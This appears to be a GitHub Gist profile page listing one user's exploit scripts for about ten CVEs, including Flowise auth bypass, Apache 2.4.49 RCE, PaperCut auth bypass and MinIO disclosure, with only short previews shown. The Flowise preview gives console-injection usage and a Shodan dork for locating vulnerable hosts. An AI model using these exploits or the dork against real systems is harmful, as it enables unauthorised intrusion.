Skip to content

Instantly share code, notes, and snippets.

View komodoooo's full-sized avatar
🔁
learning

komodo komodoooo

🔁
learning
View GitHub Profile
@komodoooo
komodoooo / fwab.js
Created May 8, 2024 18:18
CVE-2024-31621 exploit
/* CVE-2024-31621
Flowise 1.6.5 <= Authentication Bypass
By komodo
Usage: Navigate to a page that does not require auth (ex: /tools),
then inject this code inside dev tools console.
Shodan dork: http.favicon.hash:-2051052918
*/
var req = XMLHttpRequest.prototype.open;
@komodoooo
komodoooo / v3r.rb
Created October 29, 2023 14:32
CVE-2023-45852 exploit
require 'http'
require 'openssl'
require 'json'
puts """
CVE-2023-45852
Viessmann Vitogate 300 RCE exploit
By komodo\n
"""
@komodoooo
komodoooo / mrl.rb
Created October 8, 2023 14:08
CVE-2023-43261 exploit
require 'http'
require 'openssl'
puts """
CVE-2023-43261
Milesight routers information disclosure exploit
By komodo\n
"""
=begin
@komodoooo
komodoooo / cbp.rb
Created August 13, 2023 13:16
CVE-2023-37265 exploit via XFF bypass
require 'http'
require 'openssl'
require 'json'
puts """
CVE-2023-37265
CasaOS <0.4.4 Path traversal Exploit
By komodo
"""
@komodoooo
komodoooo / scr.rb
Created July 25, 2023 09:15
CVE-2023-23333 exploit
require 'http'
require 'openssl'
puts """
CVE-2023-23333
SolarView Compact <=6.00 RCE exploit
By komodo\n
"""
=begin
@komodoooo
komodoooo / gl.rb
Created July 23, 2023 18:01
CVE-2023-34598 exploit
require 'http'
require 'openssl'
puts """
CVE-2023-34598
Gibbon v25.0.0 LFI exploit
By komodo\n
"""
=begin
@komodoooo
komodoooo / dda.rb
Created June 24, 2023 18:56
CVE-2023-33568 exploit
require 'http'
require 'openssl'
puts """
CVE-2023-33568
Dolibarr 16.0.0 to 16.0.5 unauthenticated DB access exploit
By komodo\n
"""
=begin
@komodoooo
komodoooo / mi.rb
Last active June 24, 2023 18:53
CVE-2023-28432 exploit
require 'http'
require 'openssl'
puts """
CVE-2023-28432
MinIO information disclosure exploit
By komodo\n
"""
=begin
@komodoooo
komodoooo / pcl.rb
Created May 10, 2023 19:23
CVE-2023-27350 exploit
require 'http'
require 'openssl'
puts """
CVE-2023-27350
PaperCut NG 22.0.5 Build 63914 auth bypass exploit
By komodo\n
"""
=begin
@komodoooo
komodoooo / a2ur.rb
Last active February 20, 2023 19:26
CVE-2021-41773 exploit
require 'http'
require 'openssl'
puts """
CVE-2021-41773
Apache 2.4.49 (Unix) RCE Exploit
By komodo\n
"""
=begin